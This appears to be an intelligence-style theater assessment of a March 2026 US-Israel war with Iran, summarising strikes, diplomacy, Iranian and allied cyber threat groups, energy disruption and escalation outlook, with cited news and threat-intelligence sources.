CENTCOM Theater Assessment: March 2026

Executive Summary

Operation Epic Fury entered its 27th day with U.S. and Israeli forces having struck over 10,000 targets and destroyed two-thirds of Iran's military production capacity. Iran's kinetic strike capability has declined approximately 90% from day one of the conflict, but cyber operations have intensified in direct inverse proportion, with over 60 active threat groups operating (53 on the pro-Iranian side), confirmed MuddyWater pre-positioning in U.S. airport, banking, and software networks, and an unprecedented convergence of Russian and Iranian hacktivist operations [7][10]. The April 6 deadline on U.S. energy infrastructure strikes [17], the wide gap in peace negotiations [19], and the potential entry of Gulf states into the conflict [12] make the next 30 days the highest-risk period for cyber-enabled escalation against U.S. and allied critical infrastructure since the start of the Russia-Ukraine war.

Military and Diplomatic

• Kinetic operations at scale. CENTCOM has flown over 8,000 combat sorties and destroyed 130 Iranian naval vessels, the largest elimination of a navy over three weeks since World War II [1]. Over 10,000 targets have been struck inside Iran. This level of destruction to conventional military capacity is what drives the asymmetric pivot to cyber.
• Systematic leadership decapitation. Iran's intelligence minister Esmaeil Khatib was killed on March 18 [20]. IRGC Navy commander Alireza Tangsiri, who oversaw the Strait of Hormuz blockade, was killed on March 26 [20]. Senior military and nuclear leadership including Shamkhani, Mousavi, and Nasirzadeh were killed in the initial strikes [21]. The killing of the intelligence minister directly impacts MOIS cyber operations command authority.
• IRGC power consolidation. Mojtaba Khamenei was installed as supreme leader on March 9 after IRGC pressure on the Assembly of Experts [4][5]. His first statement called for continued resistance and explicitly threatened to open "other fronts in which the enemy has little experience" [6]. This is assessed with moderate confidence as a reference to expanded cyber and unconventional operations.
• Gulf state posture shift. Saudi Arabia and the UAE, initially opposed to the war, are now considering joining U.S.-Israeli strikes[12]. Their joint statement on March 26 invoked Article 51 self-defense rights after sustained Iranian attacks on their energy infrastructure [12]. A Gulf official flagged "inadequate" U.S. planning for Iranian retaliation as a driver for security partner diversification.
• Strait of Hormuz. The Strait has been effectively closed since late February, with tanker traffic down 70% and over 150 ships stranded [16]. Britain agreed to lead a 22-nation coalition to clear Iranian mines using autonomous mine-hunting drones, the first combat deployment of uncrewed mine clearance. Iran deployed sensor-equipped naval mines and is seeking to codify transit fees as a sovereignty claim [16].
• Diplomatic deadlock. Pakistan-mediated indirect talks produced a 15-point U.S. peace plan that Iran rejected as "extremely maximalist and unreasonable" [19]. Iran demanded war reparations and sovereignty recognition over the Strait [18]. Trump extended the energy strike pause to April 6 [17]. No near-term ceasefire is probable.
• Proxy activation. Iraqi Shia militias (Kataib Hezbollah, Kataib Sayyid al Shuhada, Harakat Hezbollah al Nujaba) formally joined the war [14]. Saraya Awliya al Dam flew a fiber-optic FPV reconnaissance drone inside the U.S. Embassy perimeter in Baghdad [15]. Houthis declared readiness to enter the war with "fingers on the trigger" but have so far held back in what reporting indicates is a coordinated Iranian decision [13][20]. Hezbollah launched rocket attacks against Israel within days of the Israeli ground invasion of southern Lebanon on March 17 [20].

Cyber Operations

• Threat group volume. Security researchers tracked over 60 active threat groups aligned with the conflict, with 53 operating on the pro-Iranian side [7]. This is the largest coordinated cyber campaign environment since the start of the Russia-Ukraine war.
• Electronic Operations Room. Iran established a coordination structure called the Electronic Operations Room on February 28, 2026, to synchronize state-aligned cyber operations [7]. Handala Hack, linked to Iran's MOIS, blends data exfiltration with operations against the Israeli defense establishment [7].
• MuddyWater pre-positioning in U.S. networks. Symantec and Carbon Black identified MuddyWater (Operation Olalampo) in networks of a U.S. airport, a bank, and a software firm with ties to Israel [10]. This represents latent destructive capability that could be activated at any point. TTPs overlap with the separately tracked RedKitten campaign, indicating coordinated infrastructure [10].
• Novel attack types. Handala Hack compromised Stryker's Microsoft Intune global administrator account and used MDM remote wipe to factory-reset over 200,000 systems across 79 countries [8]. Iran targeted AWS data centers in the UAE and Bahrain with a kinetic-cyber hybrid: Shahed drones caused fires that triggered fire suppression water damage, taking two AWS availability zones offline simultaneously and cascading across banking, government, and consumer services for days [8]. Both represent TTPs that have no precedent at this scale.
• Cybercrime surge. Akamai reported a 245% increase in cybercrime since the war started, with banking and fintech accounting for 40% of malicious traffic. Iran's military command explicitly designated U.S. and Israeli-linked banks as military targets [11].
• DHS/CISA alerting gap. As of the reporting period, DHS had not issued any formal alert regarding Operation Epic Fury's cybersecurity impact. This gap is occurring while CISA has lost roughly a third of its workforce and operates without permanent leadership.

Economic and Supply Chain

• Energy market disruption. The Strait of Hormuz closure has produced the largest disruption to global energy supply since the 1970s energy crisis [16]. Brent crude surged past $100/barrel, peaking at $126 [16]. Iran selectively permits transit for ships linked to India, China, Russia, and other non-adversary states, creating a two-tier passage regime [17].
• Cloud infrastructure vulnerability. The AWS kinetic-cyber hybrid attack in the UAE demonstrated that physical attacks on cloud data centers can cascade into regional digital infrastructure failures [8]. Gulf states' rapid digitization under programs like Saudi Vision 2030 and UAE smart city initiatives means this single point of failure affects banking, government services, and logistics simultaneously.
• Sanctions evasion under war conditions. The 245% cybercrime surge and Iran's explicit targeting of financial institutions [11] are consistent with the standing baseline assessment that sanctions pressure drives IRGC-affiliated actors toward revenue-generating cyber operations.

Russian-Iranian Hacktivist Convergence

• Evidence of collaboration: On March 2, pro-Russian political hacktivist group NoName057(16) teamed up with Iranian hacktivists to target Israeli defense and municipal organizations, including defense contractor Elbit Systems [9]. On March 3, pro-Russian hacktivist clusters formally joined the pro-Iran coalition, dividing their operational focus between Europe and the Middle East [9]. Unit 42 assessed that pro-Russian hacktivists are "effectively expanding the Middle East's attack surface" and potentially exposing regional infrastructure to high-disruption tactics previously used against NATO and European interests [7].
• Domains: Cyber (DDoS, website defacement, data exfiltration), information operations.
• Implications for CENTCOM: This convergence means that Gulf state and Israeli defenders now face the combined TTP repertoire of both Russian and Iranian hacktivist ecosystems. NoName057(16) brings automated DDoS tooling (DDoSia) and target selection methodology refined against NATO targets. The collaboration also creates attribution complexity that may slow defensive response.
• Confidence: High. Multiple independent sources document the coordination.
• Sources: [7], [9]

IRGC-Iraqi Militia Operational Coordination

• Evidence of collaboration: Kataib Hezbollah, Kataib Sayyid al Shuhada, and Harakat Hezbollah al Nujaba formally announced joining the war [14]. Attacks from Iraqi territory by Iran-backed militias were a specific grievance in the Gulf states' March 26 joint statement [12]. A fiber-optic FPV drone, assessed as an Iranian technology transfer, was flown inside the U.S. Embassy perimeter in Baghdad by Saraya Awliya al Dam [15].
• Domains: Military (drone attacks, ISR), technology transfer, and by extension cyber-enabled reconnaissance against U.S. installations in Iraq.
• Implications for CENTCOM: The fiber-optic FPV drone technology is significant because it defeats electronic warfare jamming, meaning U.S. force protection measures at Iraqi installations face a capability gap [15]. Iraqi militia entry also increases the threat to U.S. military logistics and communications networks in the Iraq theater.
• Confidence: High. Multiple sources confirm militia activation and technology transfer.
• Sources: [12], [14], [15]

Iranian-Houthi Calculated Restraint

• Evidence of collaboration: The Stimson Center assessed that the Houthi decision to remain on the sideline is a "calculated choice that has been fully coordinated with the Iranians" [13]. Houthi leader Abdul Malik al-Houthi declared readiness to enter with "fingers on the trigger" [20]. The Houthis are assessed as the "least damaged Axis member" and best positioned to help Tehran [13].
• Domains: Military (potential Red Sea/Bab el-Mandeb escalation), maritime.
• Implications for CENTCOM: Houthi activation is being held in reserve as a strategic escalation option. If activated, it would force CENTCOM to divert naval assets, weakening cyber-physical defense of Gulf infrastructure. Houthi-aligned cyber groups have previously targeted maritime tracking and logistics systems.
• Confidence: Moderate. The coordination is assessed, not directly observed.
• Sources: [13], [20]

Operational Implications

• U.S. financial sector is a declared target. Iran's military command publicly named U.S. banks as military targets [11]. MuddyWater has confirmed pre-positioned access in at least one U.S. bank [10]. Combined with a 245% cybercrime surge where banking/fintech accounts for 40% of malicious traffic, the U.S. financial sector faces the highest state-directed cyber threat since the 2012-2013 DDoS campaign. Defenders in this sector should treat the threat as active, not prospective.
• MDM and cloud infrastructure are now validated attack vectors. The Stryker Intune compromise (200,000+ devices wiped) [8] and the AWS kinetic-cyber hybrid attack [8] are novel TTPs that most organizations have not planned for. Any organization using cloud-based MDM or relying on Gulf-region cloud availability zones should reassess their resilience.
• The DHS/CISA alerting gap creates a defensive blind spot. No formal federal alert has been issued for the cyber dimensions of Operation Epic Fury. Defenders cannot wait for federal guidance. Private sector threat intelligence (Unit 42, Halcyon, SOCRadar) is currently the primary source of actionable indicators.
• April 6 is the next critical escalation trigger. If Trump's energy strike pause expires without a deal, resumption of strikes on Iranian energy infrastructure will almost certainly trigger retaliatory cyber operations against U.S. and allied energy networks [17]. Energy sector defenders should prepare now.
• The 22-nation Hormuz coalition creates new attack surface. Joint planning between CENTCOM and coalition partners introduces complex communications and intelligence-sharing requirements. Iranian signals intelligence and cyber espionage units will almost certainly target coalition coordination networks.

Sources: [8], [10],, [11],,, [17],

Outlook

The April 6 deadline on U.S. energy strikes is the single most important variable for the next 30 days [17]. If strikes resume, we assess with high confidence that Iranian cyber operations against U.S. energy infrastructure will escalate, likely involving destructive wiper operations consistent with historical precedents (Shamoon, ZeroCleare). Gulf state entry into the conflict, which reporting indicates is under active consideration [12], would significantly expand the cyber attack surface and could trigger Iranian cyber retaliation against Saudi and Emirati financial, energy, and government networks. The Houthi "fingers on the trigger" posture [20] represents the most consequential uncommitted escalation option; activation would stretch CENTCOM resources and open a new cyber-kinetic front in the Red Sea.

Sources: [12],, [17], [20]

Sources

• [1] "CENTCOM commander gives video update as war enters fourth week" - Stars and Stripes, https://www.stripes.com/theaters/middle_east/2026-03-21/centcom-cooper-iran-update-day-22-21139708.html
• [2] "2026 Iranian strikes on the United Arab Emirates" - Wikipedia, https://en.wikipedia.org/wiki/2026_Iranian_strikes_on_the_United_Arab_Emirates
• [3] "Iran Update Evening Special Report: March 2, 2026" - Critical Threats, https://www.criticalthreats.org/analysis/iran-update-evening-special-report-march-2-2026
• [4] "2026 Iranian supreme leader election" - Wikipedia, https://en.wikipedia.org/wiki/2026_Iranian_Supreme_Leader_election
• [5] "The New Khamenei" - Foreign Affairs, https://www.foreignaffairs.com/iran/new-khamenei
• [6] "Iran's Mojtaba Khamenei vows to fight in first statement as supreme leader" - Al Jazeera, https://www.aljazeera.com/news/2026/3/12/irans-mojtaba-khamenei-issues-first-statement-as-supreme-leader-amid-war
• [7] "Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran (Updated March 26)" - Palo Alto Unit 42, https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/
• [8] "2026 Iran War: The Complete Timeline of Every Major Cyber Attack" - The CyberSec Guru, https://thecybersecguru.com/news/2026-iran-war-complete-cyber-attack-timeline/
• [9] "Russia-linked hackers appear on Iran war's cyber front, but their impact is murky" - Nextgov/FCW, https://www.nextgov.com/cybersecurity/2026/03/russia-linked-hackers-appear-iran-wars-cyber-front-their-impact-murky/412011/
• [10] "Iranian Use of Cybercriminal Tactics in Destructive Cyber Attacks: 2026 Updates" - Halcyon, https://www.halcyon.ai/ransomware-alerts/iranian-use-of-cybercriminal-tactics-in-destructive-cyber-attacks-2026-updates
• [11] "Iran names US banks as targets, ratcheting up cyber threat" - American Banker, https://www.americanbanker.com/news/iran-names-u-s-banks-as-targets-ratcheting-up-cyber-threat
• [12] "Gulf states say they're ready for 'self defense' as stance shifts on Iran war" - CNBC, https://www.cnbc.com/2026/03/26/gulf-states-ready-for-self-defense-against-iran-as-war-stance-shifts.html
• [13] "The Houthis Must Decide: Join Iran's War Against the US and Israel or Abandon Iran" - Stimson Center, https://www.stimson.org/2026/the-houthis-must-decide-join-irans-war-against-the-us-and-israel-or-abandon-iran/
• [14] "Iraqi Shiite militias join the war between Israel, the United States, and Iran with drone attacks" - FDD's Long War Journal, https://www.longwarjournal.org/archives/2026/03/iraqi-shiite-militias-join-the-war-between-israel-the-united-states-and-iran-with-drone-attacks.php
• [15] "Iran Update, March 25, 2026" - Critical Threats, https://www.criticalthreats.org/analysis/iran-update-march-25-2026
• [16] "2026 Strait of Hormuz crisis" - Wikipedia, https://en.wikipedia.org/wiki/2026_Strait_of_Hormuz_crisis
• [17] "Day 27 of Middle East conflict: US extends pause on Iran energy strikes" - CNN, https://www.cnn.com/2026/03/26/world/live-news/iran-war-us-israel-trump
• [18] "Trump grants Iran another extension on a deadline to reopen the Strait of Hormuz" - NPR, https://www.npr.org/2026/03/26/nx-s1-5761882/iran-war-peace-conditions
• [19] "Iran calls US proposal to end war 'maximalist, unreasonable'" - Al Jazeera, https://www.aljazeera.com/news/2026/3/25/iran-calls-us-proposal-to-end-war-maximalist-unreasonable
• [20] "2026 Iran war" - Wikipedia, https://en.wikipedia.org/wiki/2026_Iran_war
• [21] "Map shows how 22 days of attacks have evolved in US-Israel war on Iran" - Al Jazeera, https://www.aljazeera.com/news/2026/3/16/map-shows-how-16-days-of-attacks-have-evolved-in-us-israel-war-on-iran
• [22] "Resecurity warns that Iran war enters multi-domain phase as cyber and kinetic operations converge" - Industrial Cyber, https://industrialcyber.co/critical-infrastructure/resecurity-warns-that-iran-war-enters-multi-domain-phase-as-cyber-and-kinetic-operations-converge/
• [23] "Analysis: Why Trump's Gulf allies are resisting pressure to join the Iran war" - CNN, https://www.cnn.com/2026/03/12/middleeast/trump-gulf-allies-resisting-iran-war-intl